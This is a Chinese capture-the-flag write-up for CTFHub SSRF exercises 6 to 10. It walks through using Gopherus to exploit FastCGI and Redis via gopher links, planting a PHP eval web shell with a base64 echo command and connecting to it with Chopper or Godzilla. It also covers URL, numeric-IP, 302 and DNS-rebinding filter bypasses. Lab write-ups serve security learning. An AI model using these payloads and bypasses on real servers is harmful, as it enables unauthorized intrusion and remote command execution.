ctfhub Web练习——SSRF(6-10)

目录

FastCGI协议

Redis协议

URL Bypass

数字IP Bypass

302跳转 Bypass

DNS重绑定 Bypass


FastCGI协议

开启题目

访问网址,页面上什么都没有 

尝试试试FastCGI协议

在kali中使用以下语句克隆Gopherus

git clone https://github.com/tarunkant/Gopherus.git

克隆成功后,在Gopherus目录下输入以下执行口令

python2 gopherus.py --exploit fastcgi 

成功后,如下图所示,需要输入目标网址真实存在的一个.php文件的绝对路径 

尝试在该网址中访问index.php,发现没有报错404,说明该.php文件真实存在

之后在gopherus的语句需要输入一句话木马

<?php @eval($_POST[cmd]);?> 

直接输入一句话木马,会报错不能输入特殊字符,所以需要将木马编码为base64 

在gopherus中输入以下语句 

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

 

得到以下链接 

将内容进行URL编码 

在url后输入,编码后的内容 

如下图所示,写入成功 

查询写入的文件是否成功写入,没有报404错误,写入成功

使用哥斯拉或者菜刀,进行远程连接访问 

访问成功

寻找,flag文件 

完成

Redis协议

与上一题思路类似,区别是上一题采用fastcgi协议,本题采用redis协议

在gopherus目录下启动终端,输入以下语句

python2 gopherus.py --exploit redis

模式选择

phpshell 

输入目标网址的绝对路径

/var/www/html

输入一句话木马

<?php @eval($_POST[cmd]);?> 

得到以下链接 

将链接进行URL编码 

访问编码后的链接,并访问写入的shell.php

使用菜刀远程连接 

连接成功后寻找flag

完成 

URL Bypass

题目提示必须包含http://notfound.ctfhub.con,若是直接使用就不能访问网站的127.0.0.1,所以采用给出网址@127.0.0.1的方式来访问

 效果如下

完成  

数字IP Bypass

开启题目发现ban掉了127以及172.,所以直接上localhost

完成

302跳转 Bypass

发现请求可能会跟随302跳转,直接localhost

完成

 

DNS重绑定 Bypass

开启题目,提示需要DNS重新绑定

在解析网站上获取解析到内网IP的域名

rbndr.us dns rebinding service

 复制内容并访问

完成

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值